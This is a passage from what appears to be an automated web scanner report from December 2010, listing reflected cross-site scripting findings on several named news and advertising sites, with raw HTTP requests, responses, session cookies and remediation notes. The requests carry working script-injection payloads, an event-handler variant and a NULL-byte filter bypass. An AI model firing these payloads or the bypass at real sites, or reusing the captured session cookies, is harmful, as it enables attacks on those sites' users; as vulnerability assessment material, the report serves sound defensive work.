GET /profile/registration-step1.htmlcb96a--><script>alert(1)</script>fac2d3fc4b6 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:39:39 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 45897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Fprofile%2Fregistration-step1.htmlcb96a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efac2d3fc4b6&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/profile/registration-step1.htmlcb96a--><script>alert(1)</script>fac2d3fc4b6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload a0173--><script>alert(1)</script>4574200b934 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /researcha0173--><script>alert(1)</script>4574200b934 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:25 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:25 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45849
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ice=http%3A%2F%2Fanalytics.informationweek.com%2Fresearcha0173--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4574200b934&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/researcha0173--><script>alert(1)</script>4574200b934"> ...[SNIP]...
3.161. http://analytics.informationweek.com/research [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/research
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 14849--><script>alert(1)</script>f31515ac1f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /research?14849--><script>alert(1)</script>f31515ac1f5=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3A%2F%2Fanalytics.informationweek.com%2Fresearch%3F14849--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef31515ac1f5%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/research?14849--><script>alert(1)</script>f31515ac1f5=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 22dc6--><script>alert(1)</script>5913f7ce75e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /rss22dc6--><script>alert(1)</script>5913f7ce75e/index.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:40:51 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:51 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45863
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... =http%3A%2F%2Fanalytics.informationweek.com%2Frss22dc6--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E5913f7ce75e%2Findex.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/rss22dc6--><script>alert(1)</script>5913f7ce75e/index.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload e4b3a--><script>alert(1)</script>e8e80bc009f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /rss/index.htmle4b3a--><script>alert(1)</script>e8e80bc009f HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:01 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:01 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45863
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %2Fanalytics.informationweek.com%2Frss%2Findex.htmle4b3a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee8e80bc009f&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/rss/index.htmle4b3a--><script>alert(1)</script>e8e80bc009f"> ...[SNIP]...
3.164. http://analytics.informationweek.com/rss/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/rss/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1e8de--><script>alert(1)</script>9cc75c83203 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /rss/index.html?1e8de--><script>alert(1)</script>9cc75c83203=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... tics.informationweek.com%2Frss%2Findex.html%3F1e8de--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9cc75c83203%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/rss/index.html?1e8de--><script>alert(1)</script>9cc75c83203=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 293fd--><script>alert(1)</script>bd5549d045a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /us293fd--><script>alert(1)</script>bd5549d045a HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:39:24 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:39:24 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45837
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... s/login?service=http%3A%2F%2Fanalytics.informationweek.com%2Fus293fd--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebd5549d045a&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/us293fd--><script>alert(1)</script>bd5549d045a"> ...[SNIP]...
3.166. http://analytics.informationweek.com/us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/us
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a51e5--><script>alert(1)</script>7a7f25fa9fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /us?a51e5--><script>alert(1)</script>7a7f25fa9fe=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... service=http%3A%2F%2Fanalytics.informationweek.com%2Fus%3Fa51e5--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7a7f25fa9fe%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/us?a51e5--><script>alert(1)</script>7a7f25fa9fe=1"> ...[SNIP]...
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 91a1c<script>alert(1)</script>dde4d07688b was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run91a1c<script>alert(1)</script>dde4d07688b&1292111969285 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:36:58 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:36:58 GMT; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 1013
COMSCORE.BMX.Buddy.run91a1c<script>alert(1)</script>dde4d07688b({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23: ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec245"><a>47e42fc78c7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2011/Registrations/Registrationec245"><a>47e42fc78c7 HTTP/1.1 Host: cloudconnectevent.reg.techweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0052ba0"><script>alert(1)</script>be250937786 was submitted in the REST URL parameter 1. This input was echoed as 52ba0"><script>alert(1)</script>be250937786 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%0052ba0"><script>alert(1)</script>be250937786 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8384"%3balert(1)//7e9279ed66f was submitted in the mpck parameter. This input was echoed as c8384";alert(1)//7e9279ed66f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/12688/116269/4274_flash_DOCSIS_02_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-116269-3297-1%3Fmpt%3D68406c8384"%3balert(1)//7e9279ed66f&mpt=68406&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.lightreading.com/blog.asp?blog_sectionid=419&doc_id=180545&site=cdn& Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 01:41:42 GMT Server: Apache Last-Modified: Tue, 16 Nov 2010 22:31:13 GMT ETag: "64ad3a-c1f-495331d392e40" Accept-Ranges: bytes Content-Length: 4158 Content-Type: application/x-javascript
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81b02"%3balert(1)//4b68246e013 was submitted in the mpvc parameter. This input was echoed as 81b02";alert(1)//4b68246e013 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/12688/116269/4274_flash_DOCSIS_02_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-116269-3297-1%3Fmpt%3D68406&mpt=68406&mpvc=81b02"%3balert(1)//4b68246e013 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.lightreading.com/blog.asp?blog_sectionid=419&doc_id=180545&site=cdn& Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 01:41:54 GMT Server: Apache Last-Modified: Tue, 16 Nov 2010 22:31:13 GMT ETag: "64ad3a-c1f-495331d392e40" Accept-Ranges: bytes Content-Length: 4134 Content-Type: application/x-javascript
3.172. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jlinks.industrybrains.com
Path:
/jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4f295<script>alert(1)</script>1142b7b9f33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=570&ct=INFORMATIONWEEK_ROS&num=5&layt=6&fmt=simp&4f295<script>alert(1)</script>1142b7b9f33=1 HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=132846550.1002835965.1291273976.1291273976.1291273976.1; __utmz=132846550.1291273976.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/61|utmcmd=referral
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 12 Dec 2010 01:41:15 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Sun, 12 Dec 2010 01:41:15 GMT Content-Type: application/x-javascript Content-Length: 69
3.173. http://www.cloudconnectevent.com/2010/exhibitor-news.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/2010/exhibitor-news.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eaf64--><img%20src%3da%20onerror%3dalert(1)>2ca9c2f03a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eaf64--><img src=a onerror=alert(1)>2ca9c2f03a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /2010/exhibitor-news.php/eaf64--><img%20src%3da%20onerror%3dalert(1)>2ca9c2f03a6 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:31:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 33237
3.174. http://www.cloudconnectevent.com/2010/in-the-news.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/2010/in-the-news.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e6af--><img%20src%3da%20onerror%3dalert(1)>5fea788f2b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e6af--><img src=a onerror=alert(1)>5fea788f2b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /2010/in-the-news.php/5e6af--><img%20src%3da%20onerror%3dalert(1)>5fea788f2b0 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:31:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 51931
3.175. http://www.cloudconnectevent.com/about/what-is-cloud-computing.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/about/what-is-cloud-computing.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a25a6--><img%20src%3da%20onerror%3dalert(1)>3c8bf8590b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a25a6--><img src=a onerror=alert(1)>3c8bf8590b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
